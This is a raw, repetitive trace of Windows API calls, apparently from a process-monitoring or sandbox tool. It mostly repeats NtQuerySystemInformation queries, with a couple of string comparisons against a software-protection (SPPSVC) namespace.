NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce70, Length=0x20, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdf0, Length=0x20, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x20, ResultLength=0x0) [0207.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcec0, Length=0x20, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.720] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.747] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.754] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.757] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.765] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.766] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.766] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.771] 